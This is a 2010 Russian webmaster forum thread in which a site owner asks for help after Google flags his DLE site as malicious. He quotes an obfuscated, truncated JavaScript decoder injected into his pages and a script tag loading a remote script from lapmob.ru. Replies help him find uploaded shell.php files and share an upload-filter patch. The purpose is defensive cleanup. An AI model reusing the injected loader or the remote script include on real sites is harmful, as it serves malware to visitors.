X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> На вашем сайте обнаружен вредоносный код.
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 13:42; Ответить: alexruss
Сообщение #1


сегодня увидел что при входе на мой сайт с гугла вылезает такое сообщение "Предупреждение- посещение этого сайта может нанести вред Вашему компьютеру!" зашел в вебмастер гугла там пишут что на некоторых страницах сайта найден какой-то левый скрипт вот он собственно

"<script>try { function mWHsJZaoGFUaHDij(adPNLlWJ){var WbqhUr
="",JkXCS,XVbdzM,aFnYAierh,ZhCrpH,NTMsj,qaUrgISe,LJhZxqoc,HS
eAsGXIk,wFnbktGHSO;var ltZHLzXjw="ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz0123456789+/=";var sFqzDVonp="";fo
r(HSeAsGXIk=0;HSeAsGXIk<adPNLlWJ.length;){ZhCrpH=ltZHLzXjw.i
ndexOf(adPNLlWJ.charAt(HSeAsGXIk++));NTMsj=ltZHLzXjw.indexOf
(adPNLlWJ.charAt(HSeAsGXIk++));wFnbktGHSO=mWHsJZaoGFUaHDij;q
aUrgISe=ltZHLzXjw.indexOf(adPNLlWJ.charAt(HSeAsGXIk++));LJhZ
xqoc=ltZHLzXjw.indexOf(adPNLlWJ.charAt(HSeAsGXIk++));JkXCS=(
ZhCrpH<<2)+(NTMsj>>4);XVbdzM=((NTMsj&15)<<4)+(qaUrgISe>>2);a
FnYAierh=((qaUrgISe&3)<<6)+LJhZxqoc;wFnbktGHSO=wFnbktGHSO.to
String();WbqhUr+=String.fromCharCode(JkXCS);if(qaUrgISe!=64)
WbqhUr+=String.fromCharCode(XVbdzM);if(LJhZxqoc!=64)WbqhUr+=
String.fromCharCode(aFnYAierh);}wFnbktGHSO=wFnbktGHSO.replac
e(/\W/g,"");wFnbktGHSO=wFnbktGHSO.split("").reverse().join("
");wFnbktGHSO=wFnbktGHSO;for(HSeAsGXIk=0;HSeAsGXIk<WbqhUr.le
ngth;HSeAsGXIk++)sFqzDVonp+=String.fromCharCode(WbqhUr.charC
odeA"


только я не могу понять где он прописан. а на одной из статистических страниц найден вот такой скрипт "<script src="http://lapmob.ru/liveinternet.js">"
подскажите ктонибуть где он может быть и что нужно сделать что-бы удалит ошибку из гугла


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 2.10.2010, 13:48; Ответить: install
Сообщение #2


Ссылку дайте хоть

перед счетчиком он где то прописался.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 13:55; Ответить: alexruss
Сообщение #3


сылка в подписи а перед счетчиком в маин.тпл смотрел не нашел


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 2.10.2010, 14:09; Ответить: install
Сообщение #4


стандартным ДЛЕ антивирем проверку сделайте, должен показать в каких файлах были изменения.

а прописан он в майн.тпл
ну и в статике тоже удалите тот скрипт


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 14:30; Ответить: alexruss
Сообщение #5


проверил антивирем изменения были в этих двух файлах
./uploads/files/1284155792_shell.php
./uploads/files/1283642103_shell.php

что это за файлы не пойму там какой-то длинный код сейчас попробую удалить эти файлы и поменяю пороли к фтп а как можно в гугле запросить перепроверку сайта?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
KipiaSoft
KipiaSoft
сообщение 2.10.2010, 14:42; Ответить: KipiaSoft
Сообщение #6


google сам предупреждение уберет в течении 1-2 дней после удаления вредного кода.
Пароли и к админке меняйте, если материалы на сайт добавляете только Вы.

Сообщение отредактировал KipiaSoft - 2.10.2010, 14:44


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 14:45; Ответить: alexruss
Сообщение #7


ок понятно буду ждать надеюсь это был тот код


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
admiNral
admiNral
сообщение 2.10.2010, 14:50; Ответить: admiNral
Сообщение #8


Чтобы этого не повторилось сделайте эти изменения в движке:

Открываем engine/inc/files.php

Находим

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );
$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allowed_files = explode( ',', strtolower( $config['files_type'] ) );
$img_result_th = "";
$img_result = "";


заменяем на

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );
$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));
$allowed_files = explode( ',', $allow_conf );
$img_result_th = "";
$img_result = "";



Теперь загрузка шеллов Вам не грозит!


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 2.10.2010, 15:32; Ответить: install
Сообщение #9


(alexruss @ 2.10.2010, 16:30) *
что это за файлы не пойму там какой-то длинный код

вот сейчас все это "добро", что нашел стандартный антивирь ДЛЕ удаляйте и чистите шаблон от левых скриптов и кодов + то что выше написали проделайте эти манипуляции тоже
еще обновитесь - заплатки поставьте.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kulbit
kulbit
сообщение 2.10.2010, 15:38; Ответить: kulbit
Сообщение #10


(KipiaSoft @ 2.10.2010, 13:42) *
google сам предупреждение уберет в течении 1-2 дней после удаления вредного кода.


Там можно принудительно сделать запрос на проверку, у меня он за ночь все убрал. Вечером попросил првоерит, а утром уже надписи небыло.

Сообщение отредактировал kulbit - 2.10.2010, 15:38


--------------------
Скажи нет терпимости!!! 14


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
3 чел. читают эту тему (гостей: 3, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте
34 CryptoCLoud 10080 18.3.2024, 16:56
автор: CryptoCLoud
Открытая тема (нет новых ответов) Странный трафик на сайте длительное время
26 TABAK 7544 16.3.2024, 17:31
автор: Boymaster
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрый и качественный обмен на сайте Baksman.org
Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк
51 Baksman 33209 15.3.2024, 21:14
автор: Baksman
Открытая тема (нет новых ответов) Алтуально ли заработок на сайте?
Оцение пожалуйста идею
10 hitman20 1780 1.2.2024, 5:37
автор: Liudmila
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыГотовые комплекты для создания узконишевых сайтов | (Готовые статьи, семантическое ядро) | Опубликуйте статьи на сайте и получите трафик из ПС без затрат на продвижение
8 rainbowinthedark 2819 14.7.2023, 16:08
автор: rainbowinthedark


 



RSS Текстовая версия Сейчас: 29.3.2024, 18:52
Дизайн